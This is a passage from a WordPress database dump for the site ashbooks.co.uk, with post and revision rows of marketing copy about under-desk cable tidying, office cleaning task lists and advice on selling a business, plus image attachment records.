15:34:18','',144,'https://ashbooks.co.uk/wp-content/uploads/2019/06/desk-cable-tidy-service.jpg',0,'attachment','image/jpeg',0),(146,1,'2019-06-18 15:34:23','2019-06-18 15:34:23','If your cables are strewn about all over the place, even if it is contained beneath the desk then any time is a good time to have it tidied up.\r\n<blockquote>On-site surveys can assess the current state of your cabling layout and point to any obvious health or performance risks.</blockquote>\r\nAny changes to your office layout, whether you are relocating desks during a move or simply placing new furniture, presents a good time to have an <a href=\"https://network-data-cabling.co.uk/under-desk-cable-management-services/\">under desk cable tidy.</a>\r\n\r\nThis ensures that once all the movement and arrangement is done, the cables are organised straightaway preventing the risk of tripping or lower network performance down the line.\r\n\r\nWhen you make changes to your IT equipment either by simply changing wires or increasing the size of your network, a cable tidy-up can ensure that you are getting the most out of the new equipment so your business can really feel the benefits.\r\n<h3>Can Tidying up Cables Really Boost Office Productivity?</h3>\r\nOf course! Streamlining the visibility of cables around the office will certainly help boost office productivity. Cables tend to be a magnet for dust, which can also lead to <a href=\"https://www.humana.com/learning-center/health-and-wellbeing/health-conditions/office-allergies\">involuntarily sneezes.</a>\r\n\r\nThe main purpose of using a desk cable tidy is to enhance the workspace around it. It has a <a href=\"https://www.amosbeech.com/blog/2018/5/9/key-tips-to-arrange-and-organise-your-office-to-enhance-comfort-and-productivity\">number of benefits</a> that include organisation and safety too.\r\n\r\n<strong>First impressions count.</strong> With property data cabling organisation, you’ll be able to project a clean, clear image to potential clients and to your workforce, which should see an increase in productivity.','What Is the Best Time for an Under Desk Cable Tidy?','','inherit','closed','closed','','144-revision-v1','','','2019-06-18 15:34:23','2019-06-18 15:34:23','',144,'https://ashbooks.co.uk/144-revision-v1',0,'revision','',0),(148,1,'2020-03-02 10:27:29','2020-03-02 10:27:29','<h2><a href=\"/\">Why is office cleaning so important?</a></h2>\r\n<strong>Office Cleaning is one of the vital factors in running a business or company. Often forgotten about because they work when everyone is out of office.</strong>\r\n\r\nIt is important to make sure that your office is cleaned from top to bottom everyday as not only does it meets health and safety standards, but it means that employees are working in a safe and hygienic area.\r\n\r\n<b>What to expect from Your office cleaner</b>\r\n\r\nCommercial cleaners offer various services to offices in cities and towns all over the UK in major cities like London, to smaller cities like Brighton, always ensuring they are <a href=\"http://www.voc-ltd.co.uk/office_cleaners_brighton.htm\" target=\"_blank\" rel=\"noopener\">fully trained</a> and reliable.\r\n\r\nMost commercial cleaners will range from small to large-sized offices. Their staff can come at days and time convenient for you.\r\n<blockquote>You don’t have to worry about supplying cleaning materials and cleaning equipment as we supply everything at no extra cost to you.</blockquote>\r\nRegular checks will be conducted to ensure your office is spotless.\r\n\r\nFind a Cleaner <a href=\"https://www.myjobquote.co.uk/cleaner\" target=\"_blank\" rel=\"noopener\">Here</a>.\r\n\r\nPlease find below an example of some of the tasks that will be performed:\r\n\r\n<strong>Hallway / Corridor area:</strong>\r\n\r\n1. Dust table, chairs, etc\r\n\r\n2. Dust pictures, ornaments, flower vases, mirrors, etc\r\n\r\n3. Dust lamps, switches, radiators, fans etc\r\n\r\n4. Hoover/mop floor\r\n\r\n<strong>Reception area:</strong>\r\n\r\n1. Dust reception table, chairs etc\r\n\r\n2. Dust pictures, ornaments, flower vases, mirrors etc\r\n\r\n3. Dust lamp, switches, radiators, fans etc\r\n\r\n4. Dust telephones, computer keyboards, computer screen, computer terminal blocks\r\n\r\n5. Dust photocopier, fax machines etc\r\n\r\n6. Wipe outside fridge\r\n\r\n7. Wipe window sills\r\n\r\n8. Hoover/mop floor\r\n\r\n9. Dust bookshelves, cupboards, drawers etc\r\n\r\n<strong>Various rooms in the office:</strong>\r\n\r\n1. Dust tables and chairs\r\n\r\n2. Dust computer screens, computer terminal blocks, computer keyboards etc\r\n\r\n3. Dust telephones, fax machines, photocopiers, printers etc\r\n\r\n4. Dust bookshelves, cupboards, drawers etc\r\n\r\n5. Dust wall borders and window sills\r\n\r\n6. Dust pictures, ornaments etc\r\n\r\n7. Dust lamp, switches, radiators , fans etc\r\n\r\n8. Clean (inside and outside windows if required)\r\n\r\n9. Hoover/mop floor\r\n\r\n<strong><a href=\"https://ashbooks.co.uk/business-plan-template-an-easy-way-to-maintain-and-keep-a-tab-on-the-progress-of-business\"><img class=\"aligncenter wp-image-150 size-full\" src=\"https://ashbooks.co.uk/wp-content/uploads/2020/03/relax.jpg\" alt=\"The Importance of Office Cleaning Services \" width=\"960\" height=\"640\" /></a>Kitchen:</strong>\r\n\r\n1. Wash up mugs and cutlery\r\n\r\n2. Wipe down worktables, outside cupboards etc\r\n\r\n3. Clean inside and outside the microwave\r\n\r\n4. Wipe down cooker and boiler\r\n\r\n5. Wipe down toasters, kettles, tea, sugar and coffee containers and other kitchen utensils\r\n\r\n6. Wipe down the fridge and sink\r\n\r\n7. Wipe down wall tiles and switches\r\n\r\n8. Wipe radiators\r\n\r\n9. Hoover/mop floor\r\n\r\n<strong>Bathroom area:</strong>\r\n\r\n1. Wipe down shower and shower screen (if any)\r\n\r\n2. Wipe down inside and behind sinks\r\n\r\n3. Wipe down inside, on top, and behind the toilets\r\n\r\n4. Wipe wall tiles\r\n\r\n5. Clean mirrors, outside cabinets etc\r\n\r\n6. Wipe window sill\r\n\r\n<a href=\"https://ashbooks.co.uk/brand-experience-will-leave-an-impact-on-the-consumer\" target=\"_blank\" rel=\"noopener\">More</a> from Ash Books','The Importance of Office Cleaning Services','','publish','closed','closed','','the-importance-of-office-cleaning-services','','','2020-03-02 10:27:48','2020-03-02 10:27:48','',0,'https://ashbooks.co.uk/?p=148',0,'post','',0),(149,1,'2020-03-02 10:25:41','2020-03-02 10:25:41','','','','inherit','closed','closed','','office-work2','','','2020-03-02 10:25:53','2020-03-02 10:25:53','',148,'https://ashbooks.co.uk/wp-content/uploads/2020/03/office-work2.jpg',0,'attachment','image/jpeg',0),(150,1,'2020-03-02 10:26:16','2020-03-02 10:26:16','','relax','','inherit','closed','closed','','relax','','','2020-03-02 10:26:22','2020-03-02 10:26:22','',148,'https://ashbooks.co.uk/wp-content/uploads/2020/03/relax.jpg',0,'attachment','image/jpeg',0),(151,1,'2020-03-02 10:27:29','2020-03-02 10:27:29','<h2>Why is office cleaning so important?</h2>\r\n&nbsp;\r\n\r\n<strong>Office Cleaning is one of the vital factors in running a business or company. Often forgotten about because they work when everyone is out of office.</strong>\r\n\r\nIt is important to make sure that your office is cleaned from top to bottom everyday as not only does it meets health and safety standards, but it means that employees are working in a safe and hygienic area.\r\n\r\n<b>What to expect from Your office cleaner</b>\r\n\r\nCommercial cleaners offer various services to offices in cities and towns all over the UK in major cities like London, to smaller cities like Brighton, always ensuring they are <a href=\"http://www.voc-ltd.co.uk/office_cleaners_brighton.htm\" target=\"_blank\" rel=\"noopener\">fully trained</a> and reliable.\r\n\r\nMost commercial cleaners will range from small to large-sized offices. Their staff can come at days and time convenient for you.\r\n<blockquote>You don’t have to worry about supplying cleaning materials and cleaning equipment as we supply everything at no extra cost to you.</blockquote>\r\nRegular checks will be conducted to ensure your office is spotless.\r\n\r\nFind a Cleaner <a href=\"https://www.myjobquote.co.uk/cleaner\" target=\"_blank\" rel=\"noopener\">Here</a>.\r\n\r\nPlease find below an example of some of the tasks that will be performed:\r\n\r\n<strong>Hallway / Corridor area:</strong>\r\n\r\n1. Dust table, chairs, etc\r\n\r\n2. Dust pictures, ornaments, flower vases, mirrors, etc\r\n\r\n3. Dust lamps, switches, radiators, fans etc\r\n\r\n4. Hoover/mop floor\r\n\r\n<strong>Reception area:</strong>\r\n\r\n1. Dust reception table, chairs etc\r\n\r\n2. Dust pictures, ornaments, flower vases, mirrors etc\r\n\r\n3. Dust lamp, switches, radiators, fans etc\r\n\r\n4. Dust telephones, computer keyboards, computer screen, computer terminal blocks\r\n\r\n5. Dust photocopier, fax machines etc\r\n\r\n6. Wipe outside fridge\r\n\r\n7. Wipe window sills\r\n\r\n8. Hoover/mop floor\r\n\r\n9. Dust bookshelves, cupboards, drawers etc\r\n\r\n<strong>Various rooms in the office:</strong>\r\n\r\n1. Dust tables and chairs\r\n\r\n2. Dust computer screens, computer terminal blocks, computer keyboards etc\r\n\r\n3. Dust telephones, fax machines, photocopiers, printers etc\r\n\r\n4. Dust bookshelves, cupboards, drawers etc\r\n\r\n5. Dust wall borders and window sills\r\n\r\n6. Dust pictures, ornaments etc\r\n\r\n7. Dust lamp, switches, radiators , fans etc\r\n\r\n8. Clean (inside and outside windows if required)\r\n\r\n9. Hoover/mop floor\r\n\r\n<strong><a href=\"https://ashbooks.co.uk/business-plan-template-an-easy-way-to-maintain-and-keep-a-tab-on-the-progress-of-business\"><img class=\"aligncenter wp-image-150 size-full\" src=\"https://ashbooks.co.uk/wp-content/uploads/2020/03/relax.jpg\" alt=\"The Importance of Office Cleaning Services \" width=\"960\" height=\"640\" /></a>Kitchen:</strong>\r\n\r\n1. Wash up mugs and cutlery\r\n\r\n2. Wipe down worktables, outside cupboards etc\r\n\r\n3. Clean inside and outside the microwave\r\n\r\n4. Wipe down cooker and boiler\r\n\r\n5. Wipe down toasters, kettles, tea, sugar and coffee containers and other kitchen utensils\r\n\r\n6. Wipe down the fridge and sink\r\n\r\n7. Wipe down wall tiles and switches\r\n\r\n8. Wipe radiators\r\n\r\n9. Hoover/mop floor\r\n\r\n<strong>Bathroom area:</strong>\r\n\r\n1. Wipe down shower and shower screen (if any)\r\n\r\n2. Wipe down inside and behind sinks\r\n\r\n3. Wipe down inside, on top, and behind the toilets\r\n\r\n4. Wipe wall tiles\r\n\r\n5. Clean mirrors, outside cabinets etc\r\n\r\n6. Wipe window sill\r\n\r\n<a href=\"https://ashbooks.co.uk/brand-experience-will-leave-an-impact-on-the-consumer\" target=\"_blank\" rel=\"noopener\">More</a> from Ash Books','The Importance of Office Cleaning Services','','inherit','closed','closed','','148-revision-v1','','','2020-03-02 10:27:29','2020-03-02 10:27:29','',148,'https://ashbooks.co.uk/148-revision-v1',0,'revision','',0),(152,1,'2020-03-02 10:27:48','2020-03-02 10:27:48','<h2><a href=\"/\">Why is office cleaning so important?</a></h2>\r\n<strong>Office Cleaning is one of the vital factors in running a business or company. Often forgotten about because they work when everyone is out of office.</strong>\r\n\r\nIt is important to make sure that your office is cleaned from top to bottom everyday as not only does it meets health and safety standards, but it means that employees are working in a safe and hygienic area.\r\n\r\n<b>What to expect from Your office cleaner</b>\r\n\r\nCommercial cleaners offer various services to offices in cities and towns all over the UK in major cities like London, to smaller cities like Brighton, always ensuring they are <a href=\"http://www.voc-ltd.co.uk/office_cleaners_brighton.htm\" target=\"_blank\" rel=\"noopener\">fully trained</a> and reliable.\r\n\r\nMost commercial cleaners will range from small to large-sized offices. Their staff can come at days and time convenient for you.\r\n<blockquote>You don’t have to worry about supplying cleaning materials and cleaning equipment as we supply everything at no extra cost to you.</blockquote>\r\nRegular checks will be conducted to ensure your office is spotless.\r\n\r\nFind a Cleaner <a href=\"https://www.myjobquote.co.uk/cleaner\" target=\"_blank\" rel=\"noopener\">Here</a>.\r\n\r\nPlease find below an example of some of the tasks that will be performed:\r\n\r\n<strong>Hallway / Corridor area:</strong>\r\n\r\n1. Dust table, chairs, etc\r\n\r\n2. Dust pictures, ornaments, flower vases, mirrors, etc\r\n\r\n3. Dust lamps, switches, radiators, fans etc\r\n\r\n4. Hoover/mop floor\r\n\r\n<strong>Reception area:</strong>\r\n\r\n1. Dust reception table, chairs etc\r\n\r\n2. Dust pictures, ornaments, flower vases, mirrors etc\r\n\r\n3. Dust lamp, switches, radiators, fans etc\r\n\r\n4. Dust telephones, computer keyboards, computer screen, computer terminal blocks\r\n\r\n5. Dust photocopier, fax machines etc\r\n\r\n6. Wipe outside fridge\r\n\r\n7. Wipe window sills\r\n\r\n8. Hoover/mop floor\r\n\r\n9. Dust bookshelves, cupboards, drawers etc\r\n\r\n<strong>Various rooms in the office:</strong>\r\n\r\n1. Dust tables and chairs\r\n\r\n2. Dust computer screens, computer terminal blocks, computer keyboards etc\r\n\r\n3. Dust telephones, fax machines, photocopiers, printers etc\r\n\r\n4. Dust bookshelves, cupboards, drawers etc\r\n\r\n5. Dust wall borders and window sills\r\n\r\n6. Dust pictures, ornaments etc\r\n\r\n7. Dust lamp, switches, radiators , fans etc\r\n\r\n8. Clean (inside and outside windows if required)\r\n\r\n9. Hoover/mop floor\r\n\r\n<strong><a href=\"https://ashbooks.co.uk/business-plan-template-an-easy-way-to-maintain-and-keep-a-tab-on-the-progress-of-business\"><img class=\"aligncenter wp-image-150 size-full\" src=\"https://ashbooks.co.uk/wp-content/uploads/2020/03/relax.jpg\" alt=\"The Importance of Office Cleaning Services \" width=\"960\" height=\"640\" /></a>Kitchen:</strong>\r\n\r\n1. Wash up mugs and cutlery\r\n\r\n2. Wipe down worktables, outside cupboards etc\r\n\r\n3. Clean inside and outside the microwave\r\n\r\n4. Wipe down cooker and boiler\r\n\r\n5. Wipe down toasters, kettles, tea, sugar and coffee containers and other kitchen utensils\r\n\r\n6. Wipe down the fridge and sink\r\n\r\n7. Wipe down wall tiles and switches\r\n\r\n8. Wipe radiators\r\n\r\n9. Hoover/mop floor\r\n\r\n<strong>Bathroom area:</strong>\r\n\r\n1. Wipe down shower and shower screen (if any)\r\n\r\n2. Wipe down inside and behind sinks\r\n\r\n3. Wipe down inside, on top, and behind the toilets\r\n\r\n4. Wipe wall tiles\r\n\r\n5. Clean mirrors, outside cabinets etc\r\n\r\n6. Wipe window sill\r\n\r\n<a href=\"https://ashbooks.co.uk/brand-experience-will-leave-an-impact-on-the-consumer\" target=\"_blank\" rel=\"noopener\">More</a> from Ash Books','The Importance of Office Cleaning Services','','inherit','closed','closed','','148-revision-v1','','','2020-03-02 10:27:48','2020-03-02 10:27:48','',148,'https://ashbooks.co.uk/148-revision-v1',0,'revision','',0),(156,1,'2020-03-02 15:57:38','2020-03-02 15:57:38','<h2><a href=\"https://ashbooks.co.uk/business-books\">Expert advice and tips for selling your business</a></h2>\r\n<strong>We have been engaged in the sale of businesses in the corporate sector with annual sales of generally between £250,000 and £20 million. </strong>\r\n\r\nWe are generally instructed in the sale of private companies for business owners and retiring directors as well as group company subsidiary disposals and on occasions the sale of whole group company interests on behalf of the shareholders.\r\n\r\nNo upfront fees required and no sale means that there is no cost to you.\r\n<h3>Success is results-driven</h3>\r\n<strong>We recommend you manage the sale process from concept through to completion and organise the following steps:</strong>\r\n<ul>\r\n 	<li>An initial meeting to review the company and discuss shareholder options and disposal aspirations including value.</li>\r\n 	<li>On instruction, the preparation of a detailed sales information memorandum, outlining the company, its products, management, key staff, assets, intellectual property and financial performance together with its market place prospects.</li>\r\n 	<li>Discuss the marketing plan and business timescale for disposal.</li>\r\n 	<li>Your business broker will engage in a proactive marketing strategy using up to date business research software facilities as well as marketing through our network of professional contacts including confidential strategic advertising were necessary.</li>\r\n 	<li>Handle management of all enquires and confidentiality undertakings, and also the evaluation of potential buyers suitability, financial profile and their financial backing for the acquisition.</li>\r\n 	<li>Arrange meetings off-site where necessary prior to shortlisting suitable buyers to go forward for a business site viewing.</li>\r\n 	<li>Handle all negotiations and offers to purchase received, including any conditions precedent.</li>\r\n 	<li>The preparation of a preferred bid list from offers received keeping you fully informed and acting upon your instructions.</li>\r\n 	<li>Selection of the preferred offer prior to the heads of terms preparation.</li>\r\n 	<li>Assistance with legal representative selection if required.</li>\r\n 	<li>Coordination of the sale process through to completion. <a href=\"https://www.inc.com/john-burley/what-you-need-to-know-before-selling-your-business.html\" target=\"_blank\" rel=\"noopener\">More</a></li>\r\n</ul>\r\n<strong><a href=\"https://ashbooks.co.uk/designing-a-region-based-business-strategy\"><img class=\"aligncenter wp-image-111 size-full\" src=\"https://ashbooks.co.uk/wp-content/uploads/2018/02/men-1979261_960_720.jpg\" alt=\"Selling your business - All you need to know \" width=\"960\" height=\"640\" /></a></strong>\r\n\r\n<strong>Top Sectors We Offer Advice To</strong>\r\n<ul>\r\n 	<li>Construction &amp; Building Services</li>\r\n 	<li>Business Services</li>\r\n 	<li>Engineering</li>\r\n 	<li>IT, Technical &amp; Web</li>\r\n 	<li>Manufacturing</li>\r\n 	<li>Waste Management &amp; Recycling</li>\r\n 	<li>Recruitment</li>\r\n 	<li>Professional and Financial Services</li>\r\n 	<li>Domiciliary Care</li>\r\n 	<li>Transport, Haulage &amp; Logistics</li>\r\n 	<li>Import &amp; Distribution</li>\r\n 	<li>Wholesale &amp; Retail</li>\r\n 	<li>Print, Publishing, Media &amp; Marketing</li>\r\n 	<li>Food Related</li>\r\n</ul>\r\n<h3>What to do with your commercial property when the business is sold</h3>\r\nThere are many things that get left behind when planning to sell a business. The most common being what to do with the premises once the business is sold.\r\n\r\n<em>If you are the owner of a commercial property that you no longer use, here are some ideas to help you overcome this obstacle. </em>\r\n\r\n<strong>Develop The Property</strong> - When people buy a commercial property, they often end up re-developing it into residential property. At Ash Books, we think that you could make an even bigger profit from selling your business by developing the property you are looking to sell yourself.\r\n\r\nIn order to do this, we recommend applying for property development loans where you can transform <a href=\"https://www.hunterfinance.co.uk/commercial-property-finance/building-finance\" target=\"_blank\" rel=\"noopener\">your commercial property into a residential one</a> and make a profit.\r\n\r\n<strong>Sell On - </strong>If property development is not for you, you could choose simply to sell the property, whilst you may end up making more from development, it is a quick and safe option just to sell the property on\r\n\r\n<strong>Rent It</strong> - If you are looking to still make an income from your old business, you can rent the old property in order to continue an income.\r\n<h3>More Business Advice</h3>\r\n<ul>\r\n 	<li><a href=\"https://ashbooks.co.uk/business-plan-template-an-easy-way-to-maintain-and-keep-a-tab-on-the-progress-of-business\" target=\"_blank\" rel=\"noopener\">Business plan Template</a></li>\r\n 	<li><a href=\"http://www.ukbi.co.uk/category/business\" target=\"_blank\" rel=\"noopener\">Business – UK Business Innovations </a></li>\r\n 	<li><a href=\"http://www.entrepreneurforum.co.uk/your-questions-answered/small-successful-businesses-in-london\" target=\"_blank\" rel=\"noopener\">Small &amp; Successful Businesses in London</a></li>\r\n</ul>','Selling your business - All you need to know','','publish','closed','closed','','selling-your-business-all-you-need-to-know','','','2020-03-02 17:56:35','2020-03-02 17:56:35','',52,'https://ashbooks.co.uk/?page_id=156',0,'page','',0),(157,1,'2020-03-02 15:53:17','2020-03-02 15:53:17','','','','inherit','closed','closed','','business-meeting','','','2020-03-02 15:53:24','2020-03-02 15:53:24','',156,'https://ashbooks.co.uk/wp-content/uploads/2020/03/business-meeting.jpg',0,'attachment','image/jpeg',0),(158,1,'2020-03-02 15:57:38','2020-03-02 15:57:38','<h2><a href=\"https://ashbooks.co.uk/business-books\">Expert advice and tips for selling your business</a></h2>\r\n<strong>We have been engaged in the sale of businesses in the corporate sector with annual sales of generally between £250,000 and £20 million. </strong>\r\n\r\nWe are generally instructed in the sale of private companies for business owners and retiring directors as well as group company subsidiary disposals and on occasions the sale of whole group company interests on behalf of the shareholders.\r\n\r\nNo upfront fees required and no sale means that there is no cost to you.\r\n<h3>Success is results-driven</h3>\r\n<strong>We recommend you manage the sale process from concept through to completion and organise the following steps:</strong>\r\n<ul>\r\n 	<li>An initial meeting to review the company and discuss shareholder options and disposal aspirations including value.</li>\r\n 	<li>On instruction, the preparation of a detailed sales information memorandum, outlining the company, its products, management, key staff, assets, intellectual property and financial performance together with its market place prospects.</li>\r\n 	<li>Discuss the marketing plan and business timescale for disposal.</li>\r\n 	<li>Your business broker will engage in a proactive marketing strategy using up to date business research software facilities as well as marketing through our network of professional contacts including confidential strategic advertising were necessary.</li>\r\n 	<li>Handle management of all enquires and confidentiality undertakings, and also the evaluation of potential buyers suitability, financial profile and their financial backing for the acquisition.</li>\r\n 	<li>Arrange meetings off-site where necessary prior to shortlisting suitable buyers to go forward for a business site viewing.</li>\r\n 	<li>Handle all negotiations and offers to purchase received, including any conditions precedent.</li>\r\n 	<li>The preparation of a preferred bid list from offers received keeping you fully informed and acting upon your instructions.</li>\r\n 	<li>Selection of the preferred offer prior to the heads of terms preparation.</li>\r\n 	<li>Assistance with legal representative selection if required.</li>\r\n 	<li>Coordination of the sale process through to completion. <a href=\"https://www.inc.com/john-burley/what-you-need-to-know-before-selling-your-business.html\" target=\"_blank\" rel=\"noopener\">More</a></li>\r\n</ul>\r\n<strong><a href=\"https://ashbooks.co.uk/designing-a-region-based-business-strategy\"><img class=\"aligncenter wp-image-111 size-full\" src=\"https://ashbooks.co.uk/wp-content/uploads/2018/02/men-1979261_960_720.jpg\" alt=\"Selling your business - All you need to know \" width=\"960\" height=\"640\" /></a></strong>\r\n\r\n<strong>Top Sectors We Offer Advice To</strong>\r\n<ul>\r\n 	<li>Construction &amp; Building Services</li>\r\n 	<li>Business Services</li>\r\n 	<li>Engineering</li>\r\n 	<li>IT, Technical &amp; Web</li>\r\n 	<li>Manufacturing</li>\r\n 	<li>Waste Management &amp; Recycling</li>\r\n 	<li>Recruitment</li>\r\n 	<li>Professional and Financial Services</li>\r\n 	<li>Domiciliary Care</li>\r\n 	<li>Transport, Haulage &amp; Logistics</li>\r\n 	<li>Import &amp; Distribution</li>\r\n 	<li>Wholesale &amp; Retail</li>\r\n 	<li>Print, Publishing, Media &amp; Marketing</li>\r\n 	<li>Food Related</li>\r\n</ul>\r\n<h3>What to do with your commercial property when the business is sold</h3>\r\nThere are many things that get left behind when planning to sell a business. The most common being what to do with the premises once the business is sold.\r\n\r\n<em>If you are the owner of a commercial property that you no longer use, here are some ideas to help you overcome this obstacle. </em>\r\n\r\n<strong>Develop The Property</strong> - When people buy a commercial property, they often end up re-developing it into residential property. At Ash Books, we think that you could make an even bigger profit from selling your business by developing the property you are looking to sell yourself.\r\n\r\nIn order to do this, we recommend applying for property development loans where you can transform your <a href=\"https://www.hunterfinance.co.uk/property-development-finance\" target=\"_blank\" rel=\"noopener\">commercial property into a residential</a> one and make a profit.\r\n\r\n<strong>Sell On - </strong>If property development is not for you, you could choose simply to sell the property, whilst you may end up making more from development, it is a quick and safe option just to sell the property on\r\n\r\n<strong>Rent It</strong> - If you are looking to still make an income from your old business, you can rent the old property in order to continue an income.\r\n<h3>More Business Advice</h3>\r\n<a href=\"https://ashbooks.co.uk/business-plan-template-an-easy-way-to-maintain-and-keep-a-tab-on-the-progress-of-business\" target=\"_blank\" rel=\"noopener\">Business plan Template</a>\r\n\r\n<a href=\"http://www.ukbi.co.uk/category/business\" target=\"_blank\" rel=\"noopener\">Business – UK Business Innovations </a>\r\n\r\n<a href=\"http://www.entrepreneurforum.co.uk/your-questions-answered/small-successful-businesses-in-london\" target=\"_blank\" rel=\"noopener\">Small &amp; Successful Businesses in London</a>\r\n\r\n&nbsp;','Selling your business - All you need to know','','inherit','closed','closed','','156-revision-v1','','','2020-03-02 15:57:38','2020-03-02 15:57:38','',156,'https://ashbooks.co.uk/156-revision-v1',0,'revision','',0),(159,1,'2020-03-02 17:55:29','2020-03-02 17:55:29','<h2><a href=\"https://ashbooks.co.uk/business-books\">Expert advice and tips for selling your business</a></h2>\n<strong>We have been engaged in the sale of businesses in the corporate sector with annual sales of generally between £250,000 and £20 million. </strong>\n\nWe are generally instructed in the sale of private companies for business owners and retiring directors as well as group company subsidiary disposals and on occasions the sale of whole group company interests on behalf of the shareholders.\n\nNo upfront fees required and no sale means that there is no cost to you.\n<h3>Success is results-driven</h3>\n<strong>We recommend you manage the sale process from concept through to completion and organise the following steps:</strong>\n<ul>\n 	<li>An initial meeting to review the company and discuss shareholder options and disposal aspirations including value.</li>\n 	<li>On instruction, the preparation of a detailed sales information memorandum, outlining the company, its products, management, key staff, assets, intellectual property and financial performance together with its market place prospects.</li>\n 	<li>Discuss the marketing plan and business timescale for disposal.</li>\n 	<li>Your business broker will engage in a proactive marketing strategy using up to date business research software facilities as well as marketing through our network of professional contacts including confidential strategic advertising were necessary.</li>\n 	<li>Handle management of all enquires and confidentiality undertakings, and also the evaluation of potential buyers suitability, financial profile and their financial backing for the acquisition.</li>\n 	<li>Arrange meetings off-site where necessary prior to shortlisting suitable buyers to go forward for a business site viewing.</li>\n 	<li>Handle all negotiations and offers to purchase received, including any conditions precedent.</li>\n 	<li>The preparation of a preferred bid list from offers received keeping you fully informed and acting upon your instructions.</li>\n 	<li>Selection of the preferred offer prior to the heads of terms preparation.</li>\n 	<li>Assistance with legal representative selection if required.</li>\n 	<li>Coordination of the sale process through to completion. <a href=\"https://www.inc.com/john-burley/what-you-need-to-know-before-selling-your-business.html\" target=\"_blank\" rel=\"noopener\">More</a></li>\n</ul>\n<strong><a href=\"https://ashbooks.co.uk/designing-a-region-based-business-strategy\"><img class=\"aligncenter wp-image-111 size-full\" src=\"https://ashbooks.co.uk/wp-content/uploads/2018/02/men-1979261_960_720.jpg\" alt=\"Selling your business - All you need to know \" width=\"960\" height=\"640\" /></a></strong>\n\n<strong>Top Sectors We Offer Advice To</strong>\n<ul>\n 	<li>Construction &amp; Building Services</li>\n 	<li>Business Services</li>\n 	<li>Engineering</li>\n 	<li>IT, Technical &amp; Web</li>\n 	<li>Manufacturing</li>\n 	<li>Waste Management &amp; Recycling</li>\n 	<li>Recruitment</li>\n 	<li>Professional and Financial Services</li>\n 	<li>Domiciliary Care</li>\n 	<li>Transport, Haulage &amp; Logistics</li>\n 	<li>Import &amp; Distribution</li>\n 	<li>Wholesale &amp; Retail</li>\n 	<li>Print, Publishing, Media &amp; Marketing</li>\n 	<li>Food Related</li>\n</ul>\n<h3>What to do with your commercial property when the business is sold</h3>\nThere are many things that get left behind when planning to sell a business. The most common being what to do with the premises once the business is sold.\n\n<em>If you are the owner of a commercial property that you no longer use, here are some ideas to help you overcome this obstacle. </em>\n\n<strong>Develop The Property</strong> - When people buy a commercial property, they often end up re-developing it into residential property. At Ash Books, we think that you could make an even bigger profit from selling your business by developing the property you are looking to sell yourself.\n\nIn order to do this, we recommend applying for property development loans where you can transform your commercial property into a residential one and make a profit.\n\n<strong>Sell On - </strong>If property development is not for you, you could choose simply to sell the property, whilst you may end up making more from development, it is a quick and safe option just to sell the property on\n\n<strong>Rent It</strong> - If you are looking to still make an income from your old business, you can rent the old property in order to continue an income.\n<h3>More Business Advice</h3>\n<a href=\"https://ashbooks.co.uk/business-plan-template-an-easy-way-to-maintain-and-keep-a-tab-on-the-progress-of-business\" target=\"_blank\" rel=\"noopener\">Business plan Template</a>\n\n<a href=\"http://www.ukbi.co.uk/category/business\" target=\"_blank\" rel=\"noopener\">Business – UK Business Innovations </a>\n\n<a href=\"http://www.entrepreneurforum.co.uk/your-questions-answered/small-successful-businesses-in-london\" target=\"_blank\" rel=\"noopener\">Small &amp; Successful Businesses in London</a>\n\n&nbsp;','Selling your business - All you need to know','','inherit','closed','closed','','156-autosave-v1','','','2020-03-02 17:55:29','2020-03-02 17:55:29','',156,'https://ashbooks.co.uk/156-autosave-v1',0,'revision','',0),(160,1,'2020-03-02 17:56:06','2020-03-02 17:56:06','<h2><a href=\"https://ashbooks.co.uk/business-books\">Expert advice and tips for selling your business</a></h2>\r\n<strong>We have been engaged in the sale of businesses in the corporate sector with annual sales of generally between £250,000 and £20 million. </strong>\r\n\r\nWe are generally instructed in the sale of private companies for business owners and retiring directors as well as group company subsidiary disposals and on occasions the sale of whole group company interests on behalf of the shareholders.\r\n\r\nNo upfront fees required and no sale means that there is no cost to you.\r\n<h3>Success is results-driven</h3>\r\n<strong>We recommend you manage the sale process from concept through to completion and organise the following steps:</strong>\r\n<ul>\r\n 	<li>An initial meeting to review the company and discuss shareholder options and disposal aspirations including value.</li>\r\n 	<li>On instruction, the preparation of a detailed sales information memorandum, outlining the company, its products, management, key staff, assets, intellectual property and financial performance together with its market place prospects.</li>\r\n 	<li>Discuss the marketing plan and business timescale for disposal.</li>\r\n 	<li>Your business broker will engage in a proactive marketing strategy using up to date business research software facilities as well as marketing through our network of professional contacts including confidential strategic advertising were necessary.</li>\r\n 	<li>Handle management of all enquires and confidentiality undertakings, and also the evaluation of potential buyers suitability, financial profile and their financial backing for the acquisition.</li>\r\n 	<li>Arrange meetings off-site where necessary prior to shortlisting suitable buyers to go forward for a business site viewing.</li>\r\n 	<li>Handle all negotiations and offers to purchase received, including any conditions precedent.</li>\r\n 	<li>The preparation of a preferred bid list from offers received keeping you fully informed and acting upon your instructions.</li>\r\n 	<li>Selection of the preferred offer prior to the heads of terms preparation.</li>\r\n 	<li>Assistance with legal representative selection if required.</li>\r\n 	<li>Coordination of the sale process through to completion. <a href=\"https://www.inc.com/john-burley/what-you-need-to-know-before-selling-your-business.html\" target=\"_blank\" rel=\"noopener\">More</a></li>\r\n</ul>\r\n<strong><a href=\"https://ashbooks.co.uk/designing-a-region-based-business-strategy\"><img class=\"aligncenter wp-image-111 size-full\" src=\"https://ashbooks.co.uk/wp-content/uploads/2018/02/men-1979261_960_720.jpg\" alt=\"Selling your business - All you need to know \" width=\"960\" height=\"640\" /></a></strong>\r\n\r\n<strong>Top Sectors We Offer Advice To</strong>\r\n<ul>\r\n 	<li>Construction &amp; Building Services</li>\r\n 	<li>Business Services</li>\r\n 	<li>Engineering</li>\r\n 	<li>IT, Technical &amp; Web</li>\r\n 	<li>Manufacturing</li>\r\n 	<li>Waste Management &amp; Recycling</li>\r\n 	<li>Recruitment</li>\r\n 	<li>Professional and Financial Services</li>\r\n 	<li>Domiciliary Care</li>\r\n 	<li>Transport, Haulage &amp; Logistics</li>\r\n 	<li>Import &amp; Distribution</li>\r\n 	<li>Wholesale &amp; Retail</li>\r\n 	<li>Print, Publishing, Media &amp; Marketing</li>\r\n 	<li>Food Related</li>\r\n</ul>\r\n<h3>What to do with your commercial property when the business is sold</h3>\r\nThere are many things that get left behind when planning to sell a business. The most common being what to do with the premises once the business is sold.\r\n\r\n<em>If you are the owner of a commercial property that you no longer use, here are some ideas to help you overcome this obstacle. </em>\r\n\r\n<strong>Develop The Property</strong> - When people buy a commercial property, they often end up re-developing it into residential property. At Ash Books, we think 